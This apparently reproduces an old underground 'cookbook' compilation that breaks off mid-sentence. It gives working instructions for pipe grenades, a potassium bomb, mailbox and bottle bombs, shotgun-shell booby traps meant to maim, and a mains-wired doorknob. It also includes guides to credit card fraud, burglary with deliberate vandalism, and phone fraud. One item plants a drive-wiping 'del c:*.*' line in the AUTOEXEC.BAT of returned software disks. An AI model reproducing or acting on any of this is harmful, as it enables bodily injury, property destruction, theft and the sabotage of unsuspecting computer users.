      Flat window screen (at least 1 foot square)
      Potassium Nitrate (granulated) 2-1/3 cups
      White sugar (granulated) 2 cups
      Powdered ferric oxide (rust) 1/8 cup (if available)
      Clear water, 1-1/2 cups

      Procedure:
      ---------

      1) Place the sugar, potassium nitrate, and water  in  the  bucket.
      Heat  with  a low flame, stirring occasionally until the sugar and
      potassium nitrate dissolve.

      2) If available, add the ferric  oxide  (rust)  to  the  solution.
      Increase the flame under the mixture until it boils gently.

      NOTE: The mixture will retain the rust coloration.

      3) Stir and scrape the bucket sides occasionally until the mixture
      is  reduced  to  one  quarter  of  its  original volume, then stir
      continuously.

      4) As the water evaporates, the mixture will become thicker  until
      it  reaches the consistency of cooked breakfast cereal or homemade
      fudge. At this stage of thickness, remove the bucket from the heat
      source, and spread the mass on the metal sheet.

      5) While the material cools, score it with a spoon or  spatula  in
      crisscrossed furrows about 1 inch apart.

      6)  Allow the material to dry, preferably in the sun. As it dries,
      resore it accordingly (about every 20 minutes) to aid drying.

      7) When the material has dried to a point  where  it  is moist and
      soft  but  not  sticky to the touch, place a small spoonful on the
      screen. Rub the material back and forth against  the  screen  mesh
      with  spoon  or other flat object until the material is granulated
      into small worm-like particles.

      8) After granulation, return the material to the sun to  allow  to
      dry completely.

        See later powder filez........  -= Exodus =-      Pipe Hand Grenade                           by Exodus

          Hand  Grenades  can  be  made  from  a piece of iron pipe. The
      filler  can  be  of  plastic  or  granular   military   explosive,
      improvised  explosive,  or  propellant  from shotgun or small arms
      munition.

      Material Required:
      -----------------

      Iron Pipe, threaded ends, 1-1/2" to 3" diameter, 3" to 8" long.
      Two (2) iron pipe caps
      Explosive or propellant
      Nonelectric blasting cap (Commercial or military)
      Fuse cord
      Hand Drill
      Pliers

      Procedure:
      ---------

      1) Place blasting cap on one end  of  fuse  cord  and  crimp  with
      pliers.

      NOTE: To find out how long the fuse cord should be, check the time
      it takes a known length to burn. If 12 inches burns in 30 seconds,
      a 6 inch cord will ignite the grenade in 15 seconds.

      2)  Screw  pipe  cap  to one end of the pipe. Place fuse cord with
      blasting cap into the opposite end so that  the  blasting  cap  is
      near the center of the pipe.

      NOTE:  If  plastic  explosive  is  to  be  used,  fill pipe BEFORE
      inserting blasting cap. Push a round stick into the center of  the
      explosive to make a hole and then insert the blasting cap.

      3)  Pour explosive or propellant into pipe a little bit at a time.
      Tap the base of the pipe frequently to settle filler.

      4) Drill a hole in the center of  the  unassembled  pipe  caplarge
      enough for the fuse cord to pass through.

      5)  Wipe  pipe  threads  to  remove any filler material. Slide the
      drilled pipe cap over the fuse and screw handtight onto the pipe.

      Ready to go!

                        Originally typed by the Jolly Roger.U.K. CREDIT CARD FRAUD - 22/10/90 - Written by CREDITMAN

U.K. credit card fraud is a lot  easier  than over in the States.  The
same basic 3 essentials are needed -

          1...A safehouse.
          2...Credit card numbers with Xp date and address.
          3...Good suppliers of next day delivery goods.

1...The Safehouse
The safehouse should be on the ground floor, so as not to piss off
the delivery man when he comes  to  drop off your freshly stolen gear.
If he has to go up 10 flights in  a complete dive and some 14 year old
kid signs for an A2000 then he's gonna wonder!  Make sure there are no
nosey neighbours, a good area is one  full of yuppies 'cos they all go
to work during daytime.  Safehouses  are  usually obtained by paying a
month's rent in  advance  or  putting  down  a  deposit  of say, 200.
Either that or break into a place and use that.

2...Credit Card Numbers.
The card number, expiry  date,  start  date  (if  possible), full name
(including middle inital), phone number and full address with postcode
are ideal.  If you can  only  get  the  sirname,  and no postcode, you
shouldn't have any real hassle.  Just  say  you moved recently to your
new address.  Phone number is handy, if it just rings and rings but if
it doesn't, then make  sure  it's  ex-directory.   You CANNOT get away
with giving them a bullshit  phone  number.  Some fussy companies want
phone numbers just to cross-check  on  CARDNET  but generally it's not
needed.  To recap, here's a quick check-list...


             1.Card number and Xpiry date.
             2.Name and address of card holder.
             3.First name/initials (OPTIONAL)
             4.Start date (OPTIONAL)
             5.Postcode (OPTIONAL)
             6.Phone number (OPTIONAL)

If you have all 6, then you  shouldn't have any hassle.  Start date is
the rarest item you could  be  asked  for,  postcode and initals being
more common.  If you are missing 3-6 then you need one helluva smooth-
talking bastard on the phone line!!!!

3...The Ordering
Not everyone can order 1000's of stuff  - it's not easy.  You have to
be cool, smooth and  have  some  good  answers  to their questions.  I
advise that you only order up to 500 worth of stuff in one go, but if
you have details 1-6 and the phone number will NOT be answered from 9-
5.30 P.M. then go up to  1000  (make  sure  it's a GOLD card!).  When
getting ready to order make sure you  have at least 3 times the amount
of suppliers you need e.g.if you want to card 5 hard-drives, make sure
you have 15 suppliers.  A lot of  the time, they are either out stock,
can't do next day delivery or won't deliver to a different address.
Quick check list of what you must ask before handing over number -

       1.Next day delivery, OK?
       2.Ordered to different address to card, OK?
       3.Do you have item in stock (pretty obvious, eh?)

Make sure you ask  ALL  of  these  questions  before handing over your
precious number.

Excuses...
Usual excuses for a  different  address  are  that  it's  a present or
you're on business here for the  next  5  weeks etc.  Any old bullshit
why it won't go to the proper address.

WARNING!*******Invoices!*******WARNING!
Invoices are sometimes sent out  with  the  actual parcel but they are
also sent out to the  card  owners  (why  do  you  think they need the
address for?) so using a safehouse for more than 2 days is risky.  A 1
day shot is safe, if they catch  on then they'll stop the goods before
getting a search warrant.

Credit Limits...
Limits on cards reach from 500 to  4000 on Gold cards.  Your average
card will be about 1000-1500.  It takes  a  while to build up a good
credit rating in order to have large  limits so don't think every card
will hold 12 IBM 386's!  Visa  and  Access  are always used - American
Xpress etc. are USELESS.

         Access = Eurocard, Mastercard (begins with 5)
         Visa = (begins with 4, 16 digit is a Gold)

A general rule is, always  confirm  an  order  to  make sure credit is
cleared.  As the month goes on, credit is  used up - the bad times are
from 27th - 3rd which is  when  all  the  bills come in.  Best time to
card is around 11th or 12th, when  the  poor guy has paid off his last
bill so you can run up a new one (he, he, he!).

Ideal items to card...

The best stuff is always computer hard-ware as it's next-day.  Amigas,
ST's, PC's -  anything  really.   Blank  discs  are  a  waste of time,
they're too heavy.  Xternal drives,  monitors  - good stuff basically.
Don't  order  any  shit   like   VCR's,  hi-fi,  video-cameras,  music
keyboards, computer software, jewerely or anything under 300.  You'll
find the listed items  are  difficult  to  get  next  day delivery and
usually won't deliver to a  different  address - bastards, eh?  You're
wasting your time with little items under 300, try to keep deliveries
under 10 a day.

The drop....
Two ways of doing the drop

     1.Sign for all the gear (make  sure you're there between 9.00 and
5.30 P.M.)

     2.Don't turn up till around 6.30  P.M.  and collect all the cards
that the delivery man has left.  These usually say 'you were out at XX
time so could you please  arrange  new  time  for  delivery or pick up
from our depot'.  In that case, piss off  to the depot and get all the
gear (need a big car!).

Remember, carding is ILLEGAL  kiddies,  so  don't  do it unless you're
going to cut me on it!!!!




                            POTASSIUM BOMB



 This is one of my favorites.  This creates a very unstable explosive in a very
 stable continer.  You will need:


 1) A two-ended bottle.  These are kinda hard to find, you have to look around,
  but if you cant find one, you will need a similar container in which there
  are two totally seperate sides that are airtight and accessable at the ends,
  like this:

                           !airtight seperator!
                    ________________!_________________
                   |                |                 |
                   /                |                 \
               ----                 |                  ----
              | c  |                |                 |c   |
              |  a |                |                 | a  |                   
              |___p|                |                 |__p_|
                   \                |                 /
                   |                |                 |
                   -----------------|-----------------

  the seperator MUST remain airtight/watertight so this doesn't blow off your
  arm in the process (believe me. it will if you are not exact)

 2) Pure potassium. Not Salt Peter, or any shit like that.  This must be the
  pure element.  This again may prove hard to find.  Try a school chemistry
  teacher.  Tell her you need it for a project, or some shit like that.  Try
  to get the biggest piece you can, because this works best if it a solid
  chuck, not a powder.  You can also try Edmund Scientific Co. at:

  Dept. 11A6
  C929 Edscorp Bldg.
  Barrington, NJ 08007
  
  or call 1-(609)-547-8880

  
 3) Cotton
 
 4) Water


  Instructions:


  Take the cotton and stuff some into one end of the container lining one side
  of the seperator.  Place some potassiun, about the size of a quarter or 
  bigger (CAREFULLY, and make sure your hands are PERFECTLY DRY, this stuff
  reacts VERY VIOLENTLY with water) into that side and pack it in tightly with
  all the cotton you can fit.  Now screw the cap on TIGHTLY.
  	On the other side of the seperator, fill it with as much water as will
  fit, and screw that cap on TIGHTLY.  You are now in possession of a compact
  explosive made somewhat stable.  To explode, throw it at something! The water
  will react with the potassium, and BBBOOOOOOMMMM!!!  Works great on windows
  or windshields, because the glass fragments go everywhere (stand back) and 
  rip stuff apart.  The bigger the piece, the bigger the boom.  If no potassium
  can be found, thy looking for PURE Sodium, it works well too.
	EXODUS relenquishes any responsibility to anyone who attempts this.  
  You are on your own....... 



     PS: you could also place this little sucker under the wheel of a car of 
  someone you hate...(Wait till' they back over that one!!!).
                   
                     HAVE PHUNNN   HEE HEE !!
   


                                                      -----------EXODUS








                            Your Legal Rights



Because you possess this little collection of mostly illegal concepts, you
should be aware of your legal rights IF arrested (hey, it happens to the worst
of us).

  Your Legal Rights are::


1)  Have a hearing before a magistrate or judge, as soon as possible after you
are arrested.
2)  Be notified of the charges against you.
3)  Have a reasonable bail set, if bail is granted.
4)  Have a FAIR, IMPARTIAL trial by jury.
5)  Be present at all stages of the trial.
6)  Confront your accusers.  (without the baseball bat)
7)  Have your lawyer cross-examine the witnesses.
8)  Have your lawyer call on witnesses on your behalf.
9)  Be tried for a crime olny once.
10) Receive neither crual nor unusual punishment if you are convicted of a 
crime and sentenced.


NOTE!!!: These rights are for after you are arrested, and do not include the 
reading of the rights, etc.  If these rights are violated in ANY way, that may
be cause for a mistrial, or even total release.





                                                   ---------EXODUS
     
                                   <--*  OUT TO HELP THE COMMOM PHREAK  *-->





                    How The Law Protects Juvenile Offenders
                            (or tries to, anyway)





Juveniles accused of breaking the law are granted some special rights intended 
to protect the, because of their age.  If a juvenile is charged with a crime 
punishable by a term in a reform school or juvenile detention facility, he is 
assured the right to:


1)  Remain silent, and not incriminate himself/herself.
2)  Be placed in quarters seperate from adult offenders while being held in
custody.
3)  Be notified before a hearing of the charges against him.
4)  Be released to his parents or guardians after signing a written promise to
appear at his trial (unless the child is likely to run away and not come back
to court unless he is dangerous or may himself be in danger if sent back home).
5)  Be tried at proceedings that are closed to the public.
6)  Have a record of the proceedings made, in case one is needed for a future 
appeal.
7)  Be represented by a lawyer.
8)  Have a lawyer appointed by the court if he cannot afford one.
9)  Confront his accusers.
10) Have his lawyer cross-examine witnesses.


Again, these rights are for after you have been arrested.




                                            --------------EXODUS

                                   <--*  OUT TO HELP THE COMMOM PHREAK  *-->









                           Down the Road' Missle



This missle is aptly named because it travels best down a street or road. This 
is nothing more that harmless phun intended to scare the living shit out of 
oncoming cars.  

How To Make A Missle
--------------------

All you need are :

-Hairspray can, or something else with flammable propellant (don't use 
spraypaint dipshit, it makes a big mess!)
 
-book of ordinary matches

-tape (clear if possible, its thinner)

-BB or pellet gun (use BB's if possible)


Instructions:
-------------

Tape the book of matches to the bottom of the can, y'know, the CONCAVE part. 
You might want to arrange the matches so that they are spread over a wide area 
of the bottom of the can, but close together.
	Shake the can up vigorously. Now place the can on its side with the 
nozzle of the can pointed in the direction you want it to go, down a road, off 
a ramp, at your sister, etc.. Now stand back a bit, and shoot at the matches.
It should take off at about 30 ft per sec!!  What happens in case you couldn't
tell, is the BB hits the matches and causes a spark, and at roughly the same
time, punctures the weak bottom of the can.  As the propellant sprays out, it
hopefully comes in contact with the spark, and presto. If you dont do it right
you'll blow a lot of money because each can can only be used once, so 
experiment to find best results.


In The Air Missle
-----------------

Compile the rocket as stated before, and put it verticle on a stand of some 
sort with the bottom accessable.  Place a section of PVC pipe 95 deg. 
preferred and shoot into the PVC pipe which should direct the BB upward, and 
the can should take off.  Experiment w/ different cans, its hard to find ones
that work perfectly, and still go higher than 30 ft.


           
                                                     ----------EXODUS











                       Phunn With Shotgun Shells



This phile is for those have no concern for themselves or the person they 
wanna fuck over with this. (in short, a fucking MANIAC!!!)


DoorBlams
---------

Shotgun shells are wonderful.  They can be used in almost any situation where 
pain or amputation of limbs is concerned (including your own if you are not
XTREEMLY careful. The best way to use shells, is the DoorBlam. The DoorBlam is
a simple concoction of a shell taped to the back of a door with the ignition
button facing away from the door (so it blows out against the door). Now 
position it somewhere where it will do the damage you want.  ie- near the top
for decapitation, middle for slow death, or low to make the victims kneecaps
fly across the room.  Now tape a thumbtack against a wall or something that
that part of the door bumps up against. Tape it to the wall so that the point
pokes through the tape, and position it so it will hit the ignit. button upon
impact... Its that simple.  Instant pain!


Long Range Explosives
---------------------

These are THE most difficult explosive i have ever tried to make (people i know
have lost fingers and hands to this little fucker)  IF you have a VVVVERY still
hand, it might be accomplished.  Ignit. buttons usually take some force to 
make it blow, so CAREFULLY & LIGHLT push a tack through tape and tape it to 
the back of the shell, with the tip of the tack LIGHTLY touching the button.
Add more tape to the back to hold the pin in place. If you still have hands at 
this point, consider yourself lucky.  Now you need to add a weight to the 
tack-end part to make sure it hits the ground first. Taping small rocks or 
making the shell by putting heavy loads towards the button helps.  Placing a 
cracker (yes a cracker (Saltines, anyone ?)) between the tack-point and the 
button helps prevent detonation upon THROWING, which DOES happen.  Now toss 
it up high and AWAY from you, and RUN LIKE SHIT does after you eat Mexican.



These two pranx are HIGHLY UNRECOMMENDED, and EXODUS takes NO responsibility for
any causes of performing them nor the results.




                                                           --------EXODUS






                          Electronic Accessories

                    <--Every Phreaker Needs His Own-->



Some phreaks believe in the down-n-dirty customizing of equipment by 
crafting it themselves...not me !.  I believe that the other guy 
should build the stuff, and I'll steal it and use it later.  This is 
a list of places where one can obtain the devices that would other 
wise have to be built by hand.  But after all, a good phreak can 
take a pre-made item and adapt it to his needs.....



**COOL STUFF::**   



Radar Jammers:                                 
--------------

The "Eclipse"
$199.00

T.E.K. Distributers
P.O. Box 32287
Fridley, MN 55432

612-783-1666



Surveillance:
-------------

fone bugging, fone recording sys., etc...


EDE 
P.O. Box 337
Buffalo, NY 14226

(716)-691-3476

catalog $5



USI Corp.,
P.O. Box PM-2052
Melbourne, FL 32902

catalog: $2 
407-725-1000



Protector
P.O. Box 520294-M
Salt Lake City, UT 84152

(801)-487-3823
catalog $5



FREE catalog:
1-800-732-5000



SpyMart
P.O. Box 340-M
Morehead City, NC 28557

catalog $4



MICRO-VIDEO:
------------

SUPERCIRCUITS
13552 Research Blvd. #B-2
Austin, TX 78750

catalog $3



Scanners:
---------

CRB
P.O. Box 56
Commack, NY 11725

FREE catalog



HPR
P.O. Box 19224PM
Denver, CO 80219
(request information, I guess!?)


MISC::
------



INFORMATION UNLIMITED        <<<---REALLY COOL SHIT, THE GOOD STUFF.
P.O. Box 716, Dept. PM294          (kinda expensive, so get ready to 
Amherst, NH 03031                                CARD!!)                  

FREE catalog (w/order, otherwise $1.00)


EDMUND SCIENTIFIC   (always a fucking GREAT place to find the little 
Dept. 14D2,                 nitty-gritty electronics that make up 
C908 EdsCorp Bldg.                    colored boxes, and the like)
Barrington, NJ 08007




                                                   -------EXODUS

                                   <--*  Out To Help The Common Phreak  *-->




  Drip Timer


Another method of time delay for explosives that are detonated by 
electric means, is the drip timer.  Fill a 'baggie' with water and 
then add as much salt as the water will hold.  Seal it, leaving some 
air inside.  Then, tape the two contact wires from which the circut 
has been broken, to the inside of a large cup. Place the baggie on 
the cup.  Poke a hole in the top of the 'baggie', where there is 
air, and then make a hole in the bottom to let the water drain into 
the cup.  As any Einstien figures, the salt water level in the cup 
will eventually cunduct electricity at the moment both wires touch 
water, thus completing the circut.  I have yet to try this timer 
out, and I got the plans from a total idiot, phreaker nonetheless, 
and doubt it would work with any power source under 12v.
                                   

                                                 ------------------007
                  +++++++++++++++++++++++++++++++
                  ++          STEALING         ++
                  +++++++++++++++++++++++++++++++



It is strange just how many files there are out there that try to 
document the art of stealing.  After all, it IS an art.  You have to 
be calm, smooth, persistant, patient.  Stealing is not an overnight- 
planned operation.  You should try to prepare for at least a week or 
more when planning to steal from a house, and even LONGER when from 
a business.  Storytime, kiddies:

    A long time ago, well, in the past year, my friends and I 
noticed that the building complex in our town was the perfect place 
to obtain unpaid-for items.  We learned all we could about the 
complex, which was about 365,000 sqft, and each company consisted of 
an office (fully furnished with cool computer stuff), and a 10,000 
sqft (roughly) warehouse, all interconnected, and all one level.  
This information was obtained through several calls to the town 
committee (board of development, or some shit like that, the place 
that you call for building permits, and the like.), and we obtained 
the blueprints for the whole complex.  We planned a route from the 
side entrance through the warehouse, and into the offices, where all 
the good stuff is usually loacated.  Now that we had our route, all 
we needed was a plan to get inside.  Since this was our first major 
job, we spent a few good weeks on preparation.  During the snow 
weather, we worked w/ a company to shovel the sidewalks of the 
complex.  One night, at about 11 pm, we stopped shoveling in front 
of our planned job site, Campbells Soup, Co.  There was nobody there 
except the janitors that cleaned up the place (or so we thought).  I 
asked the janitor if I could use the bathroom (I did have to go too) 
and he let me in.  I must have surprised him when I knew exactally 
where the bathroom was!  As I walked to it, I scanned for vid cams, 
infrared guns/recievers (little boxes at entrances with a black 
glass square about 1" sq. at about knee hight on each side).   
Nothing.  The doors all had security magnetic detection at the tops, 
and also the windows.  To think someone would break in through an 
obvious place like a large window, stupid.  To my surprise, there 
were a few losers working late, and did'nt really care that I was 
there at all.  Take another Viverin' guys, I wont be here long.  The 
smell of black coffee was stifeling.  The bathroom was located back 
by the office's entrance to the warehouse, and to my surprise, it 
was unlocked!  The lights were on, and the place was totally empty, 
except for a few cardboard remains, and shelves, and that blessed 
side door.  I walked over to the door to examine it.  No security, 
no vid cams in the warehouse, no nothing.  Odd, usually these 
warehouses were kept tight as a hookers pussy.  But it looked like 
they were packing up to move somewhere.  Boxes on the office desks, 
etc..  The door was locked with a key deadbolt (pain to pick) and a 
regular door-knob key lock.  No problem.  I needed to stop that 
deadbolt from being locked, so I looked around for something to 
use....aha!  There was some strange material like alum. foil on the 
ground, pliable, yet of a black color.  I took out a small allen key 
(a thief never goes ANYWHERE without a small lockpicking tool) and 
crammed enough of the stuff into the keyhole so that a key could not 
be inserted far enough to turn, and the stuff was inn to far to be 
pulled out.  Viola!  Back to the point of this story.  When the time 
came to make our move, something strange happened.  The place was 
abandoned for 3 days straight, most office equipment removed, and 
the front door left ajar, for all 3 days.  We still decided to enter 
via our planned route.  At 1:30am we went to the side door, and what 
a surprise, the deadbolt lock was open.  Now to the knob lock.  It 
was still locked, but not a problem.  Knob locks usually look like 
this:


                       |-wall socket>
     --------------------------
                       |       )
 d   -------------------------------|
 o                     |            |
 o                     |           )
 r                     |         )
                       |       )
     -------------------------
                       |
                       |-wall socket>

The top sliding piece is about 1/4" wide on popular locks, with the 
bar facing you, if the door swings outward.  With the smallest 
allenkey you can get, stick it in and repeatively push and slide it 
back towards the knob, but don't let go, because it is spring loaded 
and will snap back into place again.  Now for the larger bar.  Take 
another key and wedge it into the slot where the bar enters the 
other wall (without the knob on it)! and do the same thing.  This 
will be considerably harder to do than with the small tongue, but if 
you practiced like you should have, it will open with minimum effort.
Now we were inside.  We ran through the warehouse thruogh the 
warehouse/office door (these are rarely locked, but try to prepare 
for it ahead of time by "cramming the lock" like I did) and into the 
office.  The place was empty, no shelves, just desks, chairs, and 
boxes.  The boxes contained modems, motherboards, bus cards, 
printers, cables, fone cable, and one contained a Zenith laptop 
computer!  No shit, this is a true story!  We took everything we 
could carry (5 people).  We took all the above mentioned, as well as 
printer toner, fones, fone jacks, documents, desk chairs, insulated 
boxes and bags (static-free kind), even the little shit things, like 
outlet plates, light bulbs, ANYTHING!!!  We went really crazy, and 
were out in 2 min 30 sec.(always set a time limit) 
    We wound up throwing half the shit away, but it felt great just 
to take anything that was not ours!! I have since then done other 
"jobs" with much more precision, and effort, as well as better 
rewards.  Here are some tips that should be followed when attempting 
to steal::


-WEAR GLOVES!!!!!!!!!!

-backpacks for everyone to put the loot in

-always case the joint for at least a week and keep documented 
records of who leaves when, what time it closes, timed lights, etc...

-have at least 4 phriends with you, and ,please, make sure they know 
what they are doing, no idiots allowed!

-bring tools :small allen keys, both types of screwdrivers, standard 
size, and tiny, hacksaw blade, wire cutters and strippers, 
spraypaint-to leave your handle on the wall, hammer, mace, gun-if 
available, flashlights (duh), wire-good for re-routing door 
security, and bolt cutters.

-designate a person to carry all the tools ONLY-don't have him 
pickup stuff and mix it with the tools, this will only slow you down 
later iff you need to look fir a tool quickly.

-designate a person to STAY PUT by the door and keep watch.

-designate a timer, one who has a lighted stopwatch.

-make runs NO LONGER THAT 3 MIN.  ENEN THIS TIME IS EXTREEMELY 
HIGH-TRY TO KEEP AS LOW AS POSSIBLE.

-getaway vehicle (preferably NOT a van or pickup truck, these will  
be vers suspicious to the pigs..er.I mean cops.  And don't speed, or 
anything, this just attracts attention.  Cover liscence plates till 
just before you get your asses going, so no one can report the 
plates to the pigs..oops!, damn, did it again, cops.  Make sure you 
remove covering before leaving.

-Always keep flashlights pointed DOWN unless necessary, crawl under 
windows, no shouting, even if you find some phucking cool shit, on 
second thought, maybe painting your handle is a little stupid, so 
forget that, wear dark clothes OVER regular, non-suspicious clothes 
(get changed first thing in the car)

-Never brag about your findings in public, only on modem, or on BBS, 
and never give names of places, phriends, and exact names of things 
taken, (just say you 'borrowed' a 486DX 33 motherboard, don't say is 
a Intel 486DX 33 mhz for an IBM PS/1 model 50, serial 
#XXXXXXXXXXXX.  that is just plain dumb)

-Have phunn!! and never steal from your neighborhood.  

-If you break into houses, never move stuff around; the longer it 
takes the yuppie family to realize that you were there, the better.

-WEAR GLOVES!!!!!!!!!!!!!

-to get in windows: shoot window with BB gun, and place clear, 
stickey hard-cover book covering on the window over the hole, 
hopefully the inpact of the shot was enough to crack the glass, and 
LEAN OR PUSH on the covered glass, do not hit or kick, and you will 
see that the majority of the glass will stick to the covering, and 
will make considerably less noise.

-enter through basement windows preferably under a deck or steps.

-MAKE SURE THE PEOPLE WILL BE GONE FOR THE NIGHT AND THE NEIGHBORS 
ARE ASLEEP (GO FOR AROUND 2:30 AM)

-take stuff that will sell easily to friends, and don't waste time 
taking things that look neat, just take the basics:  electronic, 
computer, TV, VCR, some jewelry-things you could easily hock, 
preferably without inscriptions, raid the fridge, take good quality 
fones, stereo equip., speakers, etc..

-always case the outside of the house looking for security stickers 
that yuppie families like to place in full view.

-do mischievous shit like cut all fone lines in house, cut up couch 
cushions, and flip them over so they look perfectly normal!; shoot a 
hole in their fish tank, (all yuppies own fish); slash clothes, then 
put them back into the drawer; unplug fridge; set thermostat way up 
to 99.9 degrees; leave drain plugged and let the faucet run just a 
little, (for 6 hours!!); whatever you can't take or carry out, 
destroy in a subtle way, -if you can't carry out those 130 lb wood 
case stereo speakers, slash the cones; break ballpoint pens open and 
rub them into the carpet with their shoes; run a magnet over audio 
and VCR cassettes and floppies, and anything else subtle that would 
brighten their day.





                                        A Classic, Brought To You By 


                                                       -------EXODUS  
                  _____________________________
                 /                             \
                {+} MISCELLANEOUS INFORMATION {+}
                 \_____________________________/	



Easy explosive:

-fill Kodak film case (y'know, the black cylinder with the grey cap) 
with explosive of your choice.  Drill hole in grey lid, insert fuse, 
and tape it back together very tightly.  Light.

                        or:

-poke a hole it the grey cap facing outwards, and insert an M-80 
with fuse going through the hole and reseal, taping it tightly ALL 
AROUND the case.  Place in plastic mailbox, light, close door, and 
get the hell away!  Because of the tight airspace, the destructive 
power of the explosion is increased 5X.  Works under water too, with 
a drop of wax, or preferably rubber cement around where the cap and 
wick meet.
                         
                         and:

-fill a GLASS coke/pepsi bottle with 1 part gas, 1 part sugar, & 1 
part water. Wedge an M-80 into the top about halfway.  Shake the 
container, place in mailbox (hopefully with mail {hehe!}) light, and 
get the fuck away.  This thing sends glass shrapnel EVERYWHERE, 
including through their mail.


Doorknob Shocker:

-run a wire from one slot in wall outlet to the bracket in the wall 
that the knob's tongue inserts into.  Run another wire from the 
other slot to an inconspicuous spot on the DOORKNOB.  How does that 
one *grab* you?


Phone Loops:  (remember, tone + silence = connection)

    NUMBER     |    Tone/Silence (T/S) End  |  STATUS (on connection)
---------------------------------------------------------------------
?-???-???-????                S                no match
1-619-748-0002                T                definite tone

x-xxx-749-xxxx                T                definite tone
?-???-???-????                S                no match

1-619-739-0002                T                definite tone
x-xxx-xxx-xxx1                S                not sure of match

x-xxx-738-0002                T                definite
x-xxx-xxx-0020                S                definite

x-xxx-7xx-0002                T                definite
?-???-???-????                S                no match

Actually, any 1-619-7x9-000x gives tone detect, finding the other 
silent connection is a wee bit harder. 

If anyone manages to complete some of these, or any loops, please 
let me know.


The only bad thing about loop lines, is that eventually the Gestapo 
finds out about the over-use of the line, and assigns the # to 
anyone who wants a new # for thier fone.  Then when phreaks begin to 
use the line again, thinking it is a loop, they get a pissed off 
yuppie who then has the call traced, and thats like putting your 
balls right in a door and slamming it.  The operator will complain 
in your face, and say some bullshit like she has your # and will 
report any disturbances to the fone co. if she sees it again.



Simple Virus/Easy Way To Return A Copied Program  (hehe!)

-when you buy a game, or something from a computer store, copy it, 
and want to return it (I know all of you do this), sometimes all the 
store does is re-cellophane it and it goes back on the shelves 
without being re-tested.  If the original floppies have an 
AUTOEXEC.BAT file on them to initiate the copying/decompression at 
boot-up, simply edit it to say:

cd\
del c:*.*
y

That'll make someone's day real funny, especially if the store tries 
to test it.  Or, in most cases the store will not accept returned 
merchandise if it is not defective, so DEFECT IT.  This is done by 
using a program that shows the date and time the originals were last 
modified (check for this BEFORE installing the program!!!!!!) such as 
Dosshell, or XTGold.  Then set the date and time on your computer to 
match the originals date and time (approx).  Install the program, 
and/or copy the originals and manuals.  Now fuck around with 
the decompression file (usually PKUNZIP), the installation file, and 
any others you see.  Now the store has no reason, and MUST accept 
the product as a return, or sometimes they will give you a return 
check for the $$, and send the program back to the manufacturer, 
which is good, because it will then be recopied, resealed, and put 
back on the shelves somewhere for another phreaker to HACK!!

(If the above date/time matching is too much of a pain for the 
really retarded out there, set your computer date/time to any past 
ones close to the originals, and fuck with ALL the files, thus 
making them all match.)



Battery Bombs:

-Batteries like Duracell, Eveready, Energizer, etc... are specially 
made for home use and will not under any condition, explode when 
simply connected to each other.  Therefore, generic batteries are 
required.  These batteries can be obtained in hick country, or from 
a shitty wholesaler.  I've heard of phriends putting 9Vs in the 
fucking microwave for a minute or so, and this is supposed to 
disable the "exploder protector", but anyone who puts batteries in a 
microwave, should have the batteries explode on them.  EXODUS takes no 
responsibility for anything in this file!!!  I never found out if 2 
9v batts connected really do explode.  I hope so.


Any Blue Boxers??

-Not many people use blue boxes these days.  They've become an 
eminent danger to phreakers. Ma Bell has new equipment to detect the 
use of tone-emmitting boxes, and about the only safe place to box 
calls from is the handy-dandy pay phone at the end of the block. 
The only way to box calls today is to switch off to another 
switching system with another number:  ie-

-call a store like Toys-'R'-Us, (1-908-322-6065 Livingston, NJ) and 
ask for the technical (video game) department.  This switches the 
number from the above to the extension of the department, usually 
and extension, but it can be a totally different # you are sent to 
while you are on hold.  This is VERY good. Bullshit the employee at 
the tech dept., and wait for HIM to hang up first.  That disconnects 
you from his department, but not from the innerconnections of the 
store. (it might even be possible to dial a number and get another 
department at this point).  This is like 'stacking' trunks. Their 
dialtone (inside the store) may have a slightly higher/lower pitch 
than a dialtone at your house.  This is what you want.  Now, blow 
2600 accross the line, and you should have access to a trunk, and 
Bell Labs think that the store did it, and it is not usually 
questioned because the computer might think that it is part of their 
paging system. (not 100% sure, test around)

-when someone (preferably who you don't give a shit about) calls, 
dial *69 to ring him back.(if your area suscribes to this feature)
What sould happen is that the *69 tone asks the Bell computer to 
call back the person.  The COMPUTER does the calling at this point.  
Now when your friend picks up, bullshit him into hanging up first.  
Now the computer is getting the dialtone first, then it passes it on 
to you.  If you blow 2600 at this point, the computer may think it 
is its own equipment doing the calling.  I'm REALLY not sure about 
this one.  Hopefully this one works, but I can't test it because 
some fucked up, shit full, douche nozzle, pig fucker broke my 
MF box. <frown> MF boxes are not that hard to come by.  Many hobby 
shops, music instrument stores, or electronic stores may sell the MF 
box itself, or one that detects tones, which can be used in the 
reverse way.


Good Technical Phone Numbers:

-sometimes the hardest part of getting technical support is finding 
a place to look.  An easy place is M.I.T. (HOME OF THE ORIGINAL 
PHREAKS) Find the number for the Electronic engineering campus, call 
and say you would like the number for (give room # make one up if 
you have to), or call the person incharge of dorm assignments (buy a 
college book if you need to).  Enentually, if done right, you will 
have a list of possible #s, and set your modem on scan, and look for 
carrier detect.  One of these nerds...ahm! I mean Geniuses must have 
a computer with a modem, and these guys will answer about 100% of 
your technical problems.



Practical Jokes:

-if you are into practical jokes like I am, than here is a book for 
you:

"The Second Official Handbook of Practical Jokes"

by: Peter Van Der Linden

There are hundreds of good practical jokes and phone scams, as well 
as a section of computer jokes, with a whole program of re-writing 
the COMMAND.COM file to be funnier than ever.






                              <--* Out To Help The Common Phreak *-->


                                           --------------007
 Shaving Cream Bomb                                --------EXODUS


-This may not really be what we would consider a bomb, but it is a 
helluva great idea to phuck someone over.  You will need:

(1)-person you hate who has a car

(1)-container of liquid nitrogen (try a science shop, or Edmund 
Scientific, mentioned in several places in this Cookbook)

(6-10)-cans of generic shaving cream

(1)-free afternoon (preferably in FREEZING temperatures outside)

(1-or more)-pairs of pliars, for cutting and peeling

some phriends


Directions:

Find someone who owns a small compact car, and manage to find out 
where he keeps it at night (or while he is away!) Be able to open 
the car repeatedly.. Place a can in the liquid nitrogen for about 30 
sec.  Take it out and carefully and QUICKLY peel off the metal 
outside container, and you should have a frozen "block" of shaving 
cream.  (It helps to have more than one container, and more phriends)
Toss it into the car and do the same with all the cans.  A dozen or 
more "blocks" like this can fill and lightly PRESSURIZE a small 
car.  When he opens the door (hopefully he doesn't realize the mess 
inside due to the foggy windows), he will be covered with lbs of 
shaving cream that is a bitch to get out of upholstry. 


PS!- Try to get one is his glove compartment!!!!!





    Have Phunn....                                    ------007


This is another good way to                     Compiled by:
rip off a change or drink machine....                   -= Exodus =-
 

You first get a nice new dollar to work with.  Make sure there are no
rips in it.  Now, you get a thin piece of transparent plastic about
